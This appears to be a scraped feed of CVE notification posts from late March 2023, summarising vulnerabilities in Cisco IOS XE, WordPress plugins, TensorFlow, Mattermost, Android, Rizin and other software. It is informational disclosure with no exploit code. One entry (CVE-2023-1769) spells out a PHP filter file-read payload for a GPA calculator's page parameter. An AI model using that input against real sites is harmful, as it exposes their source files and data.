🚨 CVE-2023-20072A vulnerability in the fragmentation handling code of tunnel protocol packets in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected system to reload, resulting in a denial of service (DoS) condition. This vulnerability is due to the improper handling of large fragmented tunnel protocol packets. One example of a tunnel protocol is Generic Routing Encapsulation (GRE). An attacker could exploit this vulnerability by sending crafted fragmented packets to an affected system. A successful exploit could allow the attacker to cause the affected system to reload, resulting in a DoS condition. Note: Only traffic directed to the affected system can be used to exploit this vulnerability.🎖@cveNotify |
|
| 2023-03-31 17:29:52 |
🚨 CVE-2023-0504The HT Politic WordPress plugin before 2.3.8 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack🎖@cveNotify |
|
| 2023-03-31 17:29:48 |
🚨 CVE-2023-0503The Free WooCommerce Theme 99fy Extension WordPress plugin before 1.2.8 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack🎖@cveNotify |
|
| 2023-03-31 17:29:47 |
🚨 CVE-2023-28446Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. Arbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text. This works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run. This problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers). This issue has been patched in version 1.31.2.🎖@cveNotify |
|
| 2023-03-31 17:29:46 |
🚨 CVE-2023-28435Dataease is an open source data visualization and analysis tool. The permissions for the file upload interface is not checked so users who are not logged in can upload directly to the background. The file type also goes unchecked, users could upload any type of file. These vulnerabilities has been fixed in version 1.18.5.🎖@cveNotify |
|
| 2023-03-31 17:29:45 |
🚨 CVE-2023-28448Versionize is a framework for version tolerant serializion/deserialization of Rust data structures, designed for usecases that need fast deserialization times and minimal size overhead. An issue was discovered in the ‘Versionize::deserialize’ implementation provided by the ‘versionize’ crate for ‘vmm_sys_utils::fam::FamStructWrapper', which can lead to out of bounds memory accesses. The impact started with version 0.1.1. The issue was corrected in version 0.1.10 by inserting a check that verifies, for any deserialized header, the lengths of compared flexible arrays are equal and aborting deserialization otherwise.🎖@cveNotify |
|
| 2023-03-31 17:29:41 |
🚨 CVE-2023-25909HGiga OAKlouds file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary command or disrupt service.🎖@cveNotify |
|
| 2023-03-31 17:29:40 |
🚨 CVE-2023-27296Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong. It could be triggered by authenticated users of InLong, you could refer to [1] to know more about this vulnerability. This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick [2] to solve it. [1] https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html [2] https://github.com/apache/inlong/pull/7422 https://github.com/apache/inlong/pull/7422🎖@cveNotify |
|
| 2023-03-31 17:29:39 |
🚨 CVE-2023-25668TensorFlow is an open source platform for machine learning. Attackers using Tensorflow prior to 2.12.0 or 2.11.1 can access heap memory which is not in the control of user, leading to a crash or remote code execution. The fix will be included in TensorFlow version 2.12.0 and will also cherrypick this commit on TensorFlow version 2.11.1.🎖@cveNotify |
|
| 2023-03-31 17:29:38 |
🚨 CVE-2023-25666TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, there is a floating point exception in AudioSpectrogram. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.🎖@cveNotify |
|
| 2023-03-31 15:29:50 |
🚨 CVE-2023-28445Deno is a runtime for JavaScript and TypeScript that uses V8 and is built in Rust. Resizable ArrayBuffers passed to asynchronous functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write. It is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0. Deno Deploy users are not affected. The problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. Deno 1.32.2 will re-enable resizable ArrayBuffers with a proper fix. As a workaround, run with `--v8-flags=--no-harmony-rab-gsab` to disable resizable ArrayBuffers.🎖@cveNotify |
|
| 2023-03-31 15:29:49 |
🚨 CVE-2023-28686Dino before 0.2.3, 0.3.x before 0.3.2, and 0.4.x before 0.4.2 allows attackers to modify the personal bookmark store via a crafted message. The attacker can change the display of group chats or force a victim to join a group chat; the victim may then be tricked into disclosing sensitive information.🎖@cveNotify |
|
| 2023-03-31 15:29:48 |
🚨 CVE-2023-28818An issue was discovered in Veritas NetBackup IT Analytics 11 before 11.2.0. The application upgrade process included unsigned files that could be exploited and result in a customer installing unauthentic components. A malicious actor could install rogue Collector executable files (aptare.jar or upgrademanager.zip) on the Portal server, which might then be downloaded and installed on collectors.🎖@cveNotify |
|
| 2023-03-31 15:29:47 |
🚨 CVE-2023-1770A vulnerability has been found in SourceCodester Grade Point Average GPA Calculator 1.0 and classified as critical. Affected by this vulnerability is the function get_scale of the file Master.php. The manipulation of the argument perc leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224671.🎖@cveNotify |
|
| 2023-03-31 15:29:46 |
🚨 CVE-2023-1772A vulnerability was found in DataGear up to 4.5.1. It has been classified as problematic. This affects an unknown part of the component Diagram Type Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224673 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-31 15:29:45 |
🚨 CVE-2023-1773A vulnerability was found in Rockoa 2.3.2. It has been declared as critical. This vulnerability affects unknown code of the file webmainConfig.php of the component Configuration File Handler. The manipulation leads to code injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224674 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-31 15:29:41 |
🚨 CVE-2023-1774When processing an email invite to a private channel on a team, Mattermost fails to validate the inviter's permission to that channel, allowing an attacker to invite themselves to a private channel.🎖@cveNotify |
|
| 2023-03-31 15:29:40 |
🚨 CVE-2023-1775When running in a High Availability configuration, Mattermost fails to sanitize some of the user_updated and post_deleted events broadcast to all users, leading to disclosure of sensitive information to some of the users with currently connected Websocket clients.🎖@cveNotify |
|
| 2023-03-31 15:29:39 |
🚨 CVE-2023-1776Boards in Mattermost allows an attacker to upload a malicious SVG image file as an attachment to a card and share it using a direct link to the file.🎖@cveNotify |
|
| 2023-03-31 15:29:38 |
🚨 CVE-2023-1777Mattermost allows an attacker to request a preview of an existing message when creating a new message via the createPost API call, disclosing the contents of the linked message.🎖@cveNotify |
|
| 2023-03-31 15:29:37 |
🚨 CVE-2023-1771A vulnerability was found in SourceCodester Grade Point Average GPA Calculator 1.0 and classified as problematic. Affected by this issue is the function get_scale of the file Master.php. The manipulation of the argument perc leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224672.🎖@cveNotify |
|
| 2023-03-31 13:30:03 |
🚨 CVE-2023-1769A vulnerability, which was classified as problematic, was found in SourceCodester Grade Point Average GPA Calculator 1.0. Affected is an unknown function of the file index.php. The manipulation of the argument page with the input php://filter/read=convert.base64-encode/resource=grade_table leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-224670 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-31 13:30:01 |
🚨 CVE-2021-20251A flaw was found in samba. A race condition in the password lockout code may lead to the risk of brute force attacks being successful if special conditions are met.🎖@cveNotify |
|
| 2023-03-31 13:30:00 |
🚨 CVE-2022-4645LibTIFF 4.4.0 has an out-of-bounds read in tiffcp in tools/tiffcp.c:948, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit e8131125.🎖@cveNotify |
|
| 2023-03-31 13:29:58 |
🚨 CVE-2023-23003In the Linux kernel before 5.16, tools/perf/util/expr.c lacks a check for the hashmap__new return value.🎖@cveNotify |
|
| 2023-03-31 13:29:57 |
🚨 CVE-2023-23000In the Linux kernel before 5.17, drivers/phy/tegra/xusb.c mishandles the tegra_xusb_find_port_node return value. Callers expect NULL in the error case, but an error pointer is used.🎖@cveNotify |
|
| 2023-03-31 13:29:55 |
🚨 CVE-2023-22995In the Linux kernel before 5.17, an error path in dwc3_qcom_acpi_register_core in drivers/usb/dwc3/dwc3-qcom.c lacks certain platform_device_put and kfree calls.🎖@cveNotify |
|
| 2023-03-31 13:29:54 |
🚨 CVE-2021-31684A vulnerability was discovered in the indexOf function of JSONParserByteArray in JSON Smart versions 1.3 and 2.4 which causes a denial of service (DOS) via a crafted web request.🎖@cveNotify |
|
| 2023-03-31 13:29:52 |
🚨 CVE-2023-1060Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YKM YKM CRM allows Reflected XSS.This issue affects YKM CRM: before 23.03.30.🎖@cveNotify |
|
| 2023-03-31 13:29:51 |
🚨 CVE-2022-3996If an X.509 certificate contains a malformed policy constraint and policy processing is enabled, then a write lock will be taken twice recursively. On some operating systems (most widely: Windows) this results in a denial of service when the affected process hangs. Policy processing being enabled on a publicly facing server is not considered to be a common setup. Policy processing is enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function. Update (31 March 2023): The description of the policy processing enablement was corrected based on CVE-2023-0466.🎖@cveNotify |
|
| 2023-03-31 12:20:39 |
https://t.me/malwr |
|
| 2023-03-31 11:29:38 |
🚨 CVE-2023-28726Panasonic AiSEG2 versions 2.80F through 2.93A allows remote attackers to execute arbitrary OS commands.🎖@cveNotify |
|
| 2023-03-31 11:29:37 |
🚨 CVE-2023-28727Panasonic AiSEG2 versions 2.00J through 2.93A allows adjacent attackers bypass authentication due to mishandling of X-Forwarded-For headers.🎖@cveNotify |
|
| 2023-03-31 11:29:36 |
🚨 CVE-2023-290593CX DesktopApp through 18.12.416 has embedded malicious code, as exploited in the wild in March 2023. This affects versions 18.12.407 and 18.12.416 of the Electron Windows application shipped in Update 7, and versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 of the Electron macOS application.🎖@cveNotify |
|
| 2023-03-31 06:29:59 |
🚨 CVE-2023-1753Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-03-31 06:29:58 |
🚨 CVE-2023-1755Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-03-31 06:29:56 |
🚨 CVE-2023-1754Improper Input Validation in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-03-31 06:29:55 |
🚨 CVE-2023-26959Phpgurukul Park Ticketing Management System 1.0 is vulnerable to SQL Injection via the User Name parameter.🎖@cveNotify |
|
| 2023-03-31 06:29:53 |
🚨 CVE-2023-1628A vulnerability classified as problematic has been found in Jianming Antivirus 16.2.2022.418. Affected is an unknown function in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. VDB-224010 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-31 06:29:52 |
🚨 CVE-2023-1630A vulnerability, which was classified as problematic, has been found in JiangMin Antivirus 16.2.2022.418. Affected by this issue is the function 0x222000 in the library kvcore.sys of the component IOCTL Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224012.🎖@cveNotify |
|
| 2023-03-31 06:29:51 |
🚨 CVE-2023-1631A vulnerability, which was classified as problematic, was found in JiangMin Antivirus 16.2.2022.418. This affects the function 0x222010 in the library kvcore.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-224013 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-31 06:29:49 |
🚨 CVE-2015-10097A vulnerability was found in grinnellplans-php up to 3.0. It has been declared as critical. Affected by this vulnerability is the function interface_disp_page/interface_disp_page of the file read.php. The manipulation leads to sql injection. The attack can be launched remotely. The name of the patch is 57e4409e19203a94495140ff1b5a697734d17cfb. It is recommended to apply a patch to fix this issue. The identifier VDB-223801 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-31 06:29:48 |
🚨 CVE-2023-1634A vulnerability was found in OTCMS 6.72. It has been classified as critical. Affected is the function UseCurl of the file /admin/info_deal.php of the component URL Parameter Handler. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224016.🎖@cveNotify |
|
| 2023-03-31 06:29:47 |
🚨 CVE-2023-1647Improper Access Control in GitHub repository calcom/cal.com prior to 2.7.🎖@cveNotify |
|
| 2023-03-31 06:29:45 |
🚨 CVE-2023-22902Openfind Mail2000 file uploading function has insufficient filtering for user input. An authenticated remote attacker with general user privilege can exploit this vulnerability to inject JavaScript, conducting an XSS attack.🎖@cveNotify |
|
| 2023-03-31 06:29:44 |
🚨 CVE-2018-25083The pullit package before 1.4.0 for Node.js allows OS Command Injection because eval is used on an attacker-supplied Git branch name.🎖@cveNotify |
|
| 2023-03-31 06:29:43 |
🚨 CVE-2023-1747A vulnerability has been found in IBOS up to 4.5.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /?r=email/api/mark&op=delFromSend. The manipulation of the argument emailids leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.5.5 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-224635.🎖@cveNotify |
|
| 2023-03-31 06:29:41 |
🚨 CVE-2023-28883In Cerebrate 1.13, a blind SQL injection exists in the searchAll API endpoint.🎖@cveNotify |
|
| 2023-03-31 06:29:40 |
🚨 CVE-2023-27371GNU libmicrohttpd before 0.9.76 allows remote DoS (Denial of Service) due to improper parsing of a multipart/form-data boundary in the postprocessor.c MHD_create_post_processor() method. This allows an attacker to remotely send a malicious HTTP POST packet that includes one or more '\0' bytes in a multipart/form-data boundary field, which - assuming a specific heap layout - will result in an out-of-bounds read and a crash in the find_boundary() function.🎖@cveNotify |
|
| 2023-03-31 06:29:39 |
🚨 CVE-2023-1639A vulnerability classified as problematic has been found in IObit Malware Fighter 9.4.0.776. This affects the function 0x8001E04C in the library ImfRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224019.🎖@cveNotify |
|
| 2023-03-31 06:29:38 |
🚨 CVE-2023-1638A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been rated as problematic. Affected by this issue is the function 0x8001E024/0x8001E040 in the library ImfRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-224018 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-31 06:29:37 |
🚨 CVE-2023-1670A flaw use after free in the Linux kernel Xircom 16-bit PCMCIA (PC-card) Ethernet driver was found.A local user could use this flaw to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-03-30 21:29:54 |
🚨 CVE-2022-48426In JetBrains TeamCity before 2022.10.3 stored XSS in Perforce connection settings was possible🎖@cveNotify |
|
| 2023-03-30 21:29:50 |
🚨 CVE-2023-25662TensorFlow is an open source platform for machine learning. Versions prior to 2.12.0 and 2.11.1 are vulnerable to integer overflow in EditDistance. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.🎖@cveNotify |
|
| 2023-03-30 21:29:49 |
🚨 CVE-2022-4224In multiple products of CODESYS v3 in multiple versions a remote low privileged user could utilize this vulnerability to read and modify system files and OS resources or DoS the device.🎖@cveNotify |
|
| 2023-03-30 21:29:48 |
🚨 CVE-2023-1261Missing MAC layer security in Silicon Labs Wi-SUN SDK v1.5.0 and earlier allows malicious node to route malicious messages through network.🎖@cveNotify |
|
| 2023-03-30 21:29:45 |
🚨 CVE-2023-1262Missing MAC layer security in Silicon Labs Wi-SUN Linux Border Router v1.5.2 and earlier allows malicious node to route malicious messages through network.🎖@cveNotify |
|
| 2023-03-30 21:29:44 |
🚨 CVE-2023-20035A vulnerability in the CLI of Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to execute arbitrary commands with elevated privileges. This vulnerability is due to insufficient input validation by the system CLI. An attacker with privileges to run commands could exploit this vulnerability by first authenticating to an affected device using either local terminal access or a management shell interface and then submitting crafted input to the system CLI. A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges. An attacker with limited user privileges could use this vulnerability to gain complete control over the system. Note: For additional information about specific impacts, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-03-30 21:29:43 |
🚨 CVE-2023-20065A vulnerability in the Cisco IOx application hosting subsystem of Cisco IOS XE Software could allow an authenticated, local attacker to elevate privileges to root on an affected device. This vulnerability is due to insufficient restrictions on the hosted application. An attacker could exploit this vulnerability by logging in to and then escaping the Cisco IOx application container. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.🎖@cveNotify |
|
| 2023-03-30 21:29:39 |
🚨 CVE-2023-20059A vulnerability in the implementation of the Cisco Network Plug-and-Play (PnP) agent of Cisco DNA Center could allow an authenticated, remote attacker to view sensitive information in clear text. The attacker must have valid low-privileged user credentials. This vulnerability is due to improper role-based access control (RBAC) with the integration of PnP. An attacker could exploit this vulnerability by authenticating to the device and sending a query to an internal API. A successful exploit could allow the attacker to view sensitive information in clear text, which could include configuration files.🎖@cveNotify |
|
| 2023-03-30 21:29:38 |
🚨 CVE-2023-24838HGiga PowerStation has a vulnerability of Information Leakage. An unauthenticated remote attacker can exploit this vulnerability to obtain the administrator’s credential, resulting in performing arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-03-30 21:29:37 |
🚨 CVE-2023-27579TensorFlow is an end-to-end open source platform for machine learning. Constructing a tflite model with a paramater `filter_input_channel` of less than 1 gives a FPE. This issue has been patched in version 2.12. TensorFlow will also cherrypick the fix commit on TensorFlow 2.11.1.🎖@cveNotify |
|
| 2023-03-30 19:29:37 |
🚨 CVE-2023-1646A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been declared as critical. This vulnerability affects the function 0x8018E000/0x8018E004 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-224026 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-30 17:29:59 |
🚨 CVE-2023-1644A vulnerability was found in IObit Malware Fighter 9.4.0.776 and classified as problematic. Affected by this issue is the function 0x8018E010 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224024.🎖@cveNotify |
|
| 2023-03-30 17:29:58 |
🚨 CVE-2023-28150An issue was discovered in Independentsoft JODF before 1.1.110. The API is prone to XML external entity (XXE) injection via a remote DTD in a DOCX file.🎖@cveNotify |
|
| 2023-03-30 17:29:54 |
🚨 CVE-2022-36413Zoho ManageEngine ADSelfService Plus through 6203 is vulnerable to a brute-force attack that leads to a password reset on IDM applications.🎖@cveNotify |
|
| 2023-03-30 17:29:53 |
🚨 CVE-2023-27055Aver Information Inc PTZApp2 v20.01044.48 allows attackers to access sensitive files via a crafted GET request.🎖@cveNotify |
|
| 2023-03-30 17:29:52 |
🚨 CVE-2023-25672TensorFlow is an open source platform for machine learning. The function `tf.raw_ops.LookupTableImportV2` cannot handle scalars in the `values` parameter and gives an NPE. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.🎖@cveNotify |
|
| 2023-03-30 17:29:48 |
🚨 CVE-2023-1725Server-Side Request Forgery (SSRF) vulnerability in Infoline Project Management System allows Server Side Request Forgery.This issue affects Project Management System: before 4.09.31.125.🎖@cveNotify |
|
| 2023-03-30 17:29:47 |
🚨 CVE-2023-25076A buffer overflow vulnerability exists in the handling of wildcard backend hosts of SNIProxy 0.6.0-2 and the master branch (commit: 822bb80df9b7b345cc9eba55df74a07b498819ba). A specially crafted HTTP, TLS or DTLS packet can lead to arbitrary code execution. An attacker could send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-30 17:29:46 |
🚨 CVE-2023-1289A vulnerability was discovered in ImageMagick where a specially created SVG file loads itself and causes a segmentation fault. This flaw allows a remote attacker to pass a specially crafted SVG file that leads to a segmentation fault, generating many trash files in "/tmp," resulting in a denial of service. When ImageMagick crashes, it generates a lot of trash files. These trash files can be large if the SVG file contains many render actions. In a denial of service attack, if a remote attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. If an attacker uploads a 100M SVG, the server will generate about 10G.🎖@cveNotify |
|
| 2023-03-30 17:29:45 |
🚨 CVE-2023-21024In maybeFinish of FallbackHome.java, there is a possible delay of lockdown screen due to logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-246543238🎖@cveNotify |
|
| 2023-03-30 17:29:41 |
🚨 CVE-2023-21026In updateInputChannel of WindowManagerService.java, there is a possible way to set a touchable region beyond its own SurfaceControl due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-254681548🎖@cveNotify |
|
| 2023-03-30 17:29:40 |
🚨 CVE-2023-21028In parse_printerAttributes of ipphelper.c, there is a possible out of bounds read due to a string without a null-terminator. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-180680572🎖@cveNotify |
|
| 2023-03-30 17:29:39 |
🚨 CVE-2023-21056In lwis_slc_buffer_free of lwis_device_slc.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-245300559References: N/A🎖@cveNotify |
|
| 2023-03-30 17:29:38 |
🚨 CVE-2022-40208In Moodle, insufficient limitations in some quiz web services made it possible for students to bypass sequential navigation during a quiz attempt.🎖@cveNotify |
|
| 2023-03-30 12:29:37 |
🚨 CVE-2023-28935** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" (DUCC) module of Apache UIMA, an authenticated user that has the permissions to modify core entities can cause command execution as the system user that runs the web process. As the "Distributed UIMA Cluster Computing" module for UIMA is retired, we do not plan to release a fix for this issue. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-03-30 12:29:36 |
🚨 CVE-2023-1699Rapid7 Nexpose versions 6.6.186 and below suffer from a forced browsing vulnerability. This vulnerability allows an attacker to manipulate URLs to forcefully browse to and access administrative pages. This vulnerability is fixed in version 6.6.187.🎖@cveNotify |
|
| 2023-03-30 11:29:37 |
🚨 CVE-2023-26116All versions of the package angular are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.🎖@cveNotify |
|
| 2023-03-30 06:29:58 |
🚨 CVE-2022-36040Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when getting data from PYC(python) files. A user opening a malicious PYC file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number 68948017423a12786704e54227b8b2f918c2fd27 contains a patch.🎖@cveNotify |
|
| 2023-03-30 06:29:57 |
🚨 CVE-2022-36041Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when parsing Mach-O files. A user opening a malicious Mach-O file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number 7323e64d68ecccfb0ed3ee480f704384c38676b2 contains a patch.🎖@cveNotify |
|
| 2023-03-30 06:29:56 |
🚨 CVE-2022-36044Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when getting data from Luac files. A user opening a malicious Luac file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commits 07b43bc8aa1ffebd9b68d60624c9610cf7e460c7 and 05bbd147caccc60162d6fba9baaaf24befa281cd contain fixes for the issue.🎖@cveNotify |
|
| 2023-03-30 06:29:55 |
🚨 CVE-2022-36042Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when getting data from dyld cache files. A user opening a malicious dyld cache file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number 556ca2f9eef01ec0f4a76d1fbacfcf3a87a44810 contains a patch.🎖@cveNotify |
|
| 2023-03-30 06:29:51 |
🚨 CVE-2022-34612Rizin v0.4.0 and below was discovered to contain an integer overflow via the function get_long_object(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted binary.🎖@cveNotify |
|
| 2023-03-30 06:29:50 |
🚨 CVE-2023-26864SQL injection vulnerability found in PrestaShop smplredirectionsmanager v.1.1.19 and before allow a remote attacker to gain privileges via the SmplTools::getMatchingRedirectionsFromPartscomponent.🎖@cveNotify |
|
| 2023-03-30 06:29:49 |
🚨 CVE-2023-20975In getAvailabilityStatus of EnableContentCapturePreferenceController.java, there is a possible way to bypass DISALLOW_CONTENT_CAPTURE due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-250573776🎖@cveNotify |
|
| 2023-03-30 06:29:48 |
🚨 CVE-2023-20974In btm_ble_add_resolving_list_entry_complete of btm_ble_privacy.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-260078907🎖@cveNotify |
|
| 2023-03-30 06:29:44 |
🚨 CVE-2023-21035In multiple functions of BackupHelper.java, there is a possible way for an app to get permissions previously granted to another app with the same package name due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-184847040🎖@cveNotify |
|
| 2023-03-30 06:29:43 |
🚨 CVE-2023-21030In Confirmation of keystore_cli_v2.cpp, there is a possible way to corrupt memory due to a double free. This could lead to local escalation of privilege in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-226234140🎖@cveNotify |
|
| 2023-03-30 06:29:42 |
🚨 CVE-2023-0665HashiCorp Vault's PKI mount issuer endpoints did not correctly authorize access to remove an issuer or modify issuer metadata, potentially resulting in denial of service of the PKI mount. This bug did not affect public or private key material, trust chains or certificate issuance. Fixed in Vault 1.13.1, 1.12.5, and 1.11.9.🎖@cveNotify |
|
| 2023-03-30 06:29:38 |
🚨 CVE-2023-21029In register of UidObserverController.java, there is a missing permission check. This could lead to local information disclosure of app usage with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-217934898🎖@cveNotify |
|
| 2023-03-30 06:29:37 |
🚨 CVE-2023-21068In (TBD) of (TBD), there is a possible way to boot with a hidden debug policy due to a missing warning to the user. This could lead to local escalation of privilege after preparing the device, hiding the warning, and passing the phone to a new user, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-243433344References: N/A🎖@cveNotify |
|
| 2023-03-30 06:29:36 |
🚨 CVE-2023-21065In fdt_next_tag of fdt.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630493References: N/A🎖@cveNotify |
|
| 2023-03-29 23:29:36 |
🚨 CVE-2023-28501Rocket Software UniData versions prior to 8.2.4 build 3003 and UniVerse versions prior to 11.3.5 build 1001 or 12.2.1 build 2002 suffer from a heap-based buffer overflow in the unirpcd daemon that, if successfully exploited, can lead to remote code execution as the root user.🎖@cveNotify |
|
| 2023-03-29 21:29:56 |
🚨 CVE-2022-37355This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPG files. Crafted data in a JPG file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-17629.🎖@cveNotify |
|
| 2023-03-29 21:29:55 |
🚨 CVE-2022-37387This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.2.2.53575. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-17552.🎖@cveNotify |
|
| 2023-03-29 21:29:54 |
🚨 CVE-2022-42428This vulnerability allows remote attackers to escalate privileges on affected installations of Centreon. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of requests to modify poller broker configuration. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator. Was ZDI-CAN-18410.🎖@cveNotify |
|
| 2023-03-29 21:29:50 |
